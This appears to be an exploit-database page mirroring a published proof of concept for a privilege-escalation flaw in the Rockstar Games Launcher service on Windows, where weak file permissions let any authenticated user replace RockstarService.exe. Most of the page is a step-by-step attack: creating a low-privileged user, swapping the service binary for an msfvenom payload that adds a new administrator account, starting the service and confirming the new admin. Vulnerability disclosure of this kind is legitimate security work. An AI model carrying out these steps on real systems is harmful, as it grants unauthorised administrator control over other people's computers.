Advertisement






Rockstar Service Insecure File Permissions

CVE Category Price Severity
CVE-2021-39000 CWE-276 $500 High
Author Risk Exploitation Type Date
Anonymous High Remote 2021-04-05
CPE
cpe:cpe:/a:rockstar:service:insecure-file-permissions
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040029

Below is a copy:

Rockstar Service Insecure File Permissions
# Exploit Title: Rockstar Service - Insecure File Permissions
# Date: 2020-04-02
# Exploit Author: George Tsimpidas
# Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher
# Version Patch: 1.0.37.349
# Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362

Vulnerability Description:

RockstarService.exe  suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege"

#PoC

 D:\Launcher> icacls .\Launcher.exe

.\Launcher.exe BUILTIN\Administrators:(I)(F)
               NT AUTHORITY\SYSTEM:(I)(F)
               NT AUTHORITY\Authenticated Users:(I)(M)
               BUILTIN\Users:(I)(RX)

#1. Create low privileged user & Login  to that user

C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None

#2. Move the RockstarService.exe to a new name

D:\Launcher> move RockstarService.exe RockstarService.exe.bk
1 file(s) moved.

#3. Create malicious binary on kali linux with MSF

msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe

#4. Transfer created 'RockstarService.exe' to the Windows Host

#5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one

#6. Now start the Service

Command : net start 'Rockstar Service'

Now check out that the user has been registered to the system and added to the local group of Administrators

C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr
/v "Full"

User name placebo
Local Group Memberships *Administrators *Users
Global Group memberships *None

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum